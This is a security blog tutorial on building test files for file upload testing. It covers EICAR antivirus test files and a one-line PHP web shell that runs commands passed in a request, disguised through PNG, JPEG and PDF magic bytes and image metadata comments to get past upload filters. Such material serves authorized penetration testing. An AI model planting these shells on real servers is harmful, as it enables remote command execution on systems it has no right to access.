How to Create Security Test Files for File Upload

I created a bunch of test files for security testing file upload functionalities and decided to write this walkthrough on how each file was created!

You can also download the test files from my GitHub, but hopefully people doing security testing don't download random files from the internet :D Instead, it's better to understand how the files work and create them from scratch.

If you're not familiar with file upload testing in general, you can for example read the PortSwigger tutorial about it.

So here are the instructions on how to create these test files yourself.

File upload test files

Here's the list of files covered in this walkthrough:

• regular-excel-document.xlsx
• regular-pdf-document.pdf
• regular-png-file.png
• regular-text-document.txt
• regular-word-document.docx
• eicar-text-document.txt
• eicar-excel-document.xlsx
• eicar-word-document.docx
• php-shell.php
• php-shell-directly-in-image.png
• php-shell-added-to-end-png-magic-bytes.php
• php-shell-with-jpeg-magic-bytes.php
• php-shell-with-pdf-magic-bytes.php
• png-file-with-php-payload-in-comment-metadata.png
• php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Regular files

These are files that don’t have anything special in them.

• The Excel file is just a regular spreadsheet created in Excel with some text and a =1+1 calculation.
• The Word document is created with Word and includes some text.
• The PDF file is exported from the Word document above and also contains some text.
• The text document is simply a .txt file with some text in it.
• The .png file is just a small image file.

Sometimes you just need to try the file upload works as intented and the best way to do that is to use files the service is expecting to get.

EICAR files

⚠️ Important note: EICAR files will likely trigger your antivirus software. However, these are non-malicious files. It's a good idea to create them inside a VM or exclude the folder where you're creating them from your antivirus scans.

What is EICAR?

The EICAR Anti-Virus Test File is a file designed for testing antivirus software without using real malware. It’s a benign file that gets flagged as malicious by antivirus engines. EICAR files can be used to check whether file uploads are scanned for malware.

The file is a legitimate DOS program made up of 68 printable ASCII characters. If run, it prints the message "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!".

eicar-text-document.txt

Create a new text document and paste the following string into it:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

eicar-excel-document.xlsx

Create a new Excel document, go to Insert → Text → Object → Create from File, and attach the previously created EICAR text file. Then save the document.

eicar-word-document.docx

Create a new Word document, go to Insert → Object → Create from File, and attach the previously created EICAR text file. Save the document.

PHP shells

The goal of uploading a PHP shell is to test whether the application allows the upload of executable code and whether that code can actually be executed. These are simple examples, so you should modify the payloads to suit your specific test environment.

php-shell.php

Create a new text file and paste the following code into it:

<?php system($_REQUEST['cmd']); ?>

Save the file and rename it to .php, or use the following Linux command to create the file:

echo '<?php system($_REQUEST['cmd']); ?>' >> php-shell.php

php-shell-directly-in-image.png

Same as above, but save the file with a .png extension, or use:

echo '<?php system($_REQUEST['cmd']); ?>' >> php-shell-directly-in-image.png

PHP shells using magic bytes

Magic bytes are the first few bytes of a file and are used to identify the file type. They’re also known as the file signature.

By modifying the magic bytes, we can make it look like we've uploaded for example an image, when it actually is a PHP shell.

php-shell-added-to-end-png-magic-bytes.php

Create this file by appending the payload to the end of a regular .png file and renaming it:

echo '<?php system($_REQUEST['cmd']); ?>' >> regular-png-file.png && mv regular-png-file.png php-shell-added-to-end-png-magic-bytes.php

That command first writes <?php system($_REQUEST['cmd']); ?> to a file that is named regular-png-file.png by using echo and >> and then runs the command mv, which is used to rename the file.

php-shell-with-jpeg-magic-bytes.php

Use a hex editor to change the first bytes of php-shell.php to:

FF D8 FF DB

These bytes make it look like the file is a .jpeg. I used hexedit for changing the bytes and xxd for checking if the change was successful.

⚠️ You may need to add a few characters to the beginning of the file before the payload, as changing the initial bytes might overwrite part of it.

php-shell-with-pdf-magic-bytes.php

Change the first bytes of php-shell.php to:

25 50 44 46 2D

This makes the file appear to be a .pdf.

⚠️ Again, you may need to insert few characters to prevent the payload from being discarded.

png-file-with-php-payload-in-comment-metadata.png

Use exiftool to add a PHP shell payload as a comment in a PNG image:

exiftool -comment='<?php system($_REQUEST['cmd']); ?>' png-file-with-php-payload-in-comment-metadata.png

regular-png-file.png can be used. I renamed it to png-file-with-php-payload-in-comment-metadata.png so it would be clear which file contains what.

php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Use exiftool to add a PHP shell payload as a comment in a PNG image:

exiftool -comment='<?php system($_REQUEST['cmd']); ?>' png-file-with-php-payload-in-comment-metadata.png

The same as above but rename the .png file to .php. The magic bytes will still correspond to PNG, but the file will be .php.

Background

I hope this tutorial was useful to you! As an Information Security Specialist at 2NS, I get to learn something new about cybersecurity every day. Through this blog, I aim to share tools and techniques that I find valuable in my work, hoping to help others in the field.

Follow me on Instagram @minjahakkeroi for a behind-the-scenes look at my work as an ethical hacker, and to learn more cybersecurity tips and insights!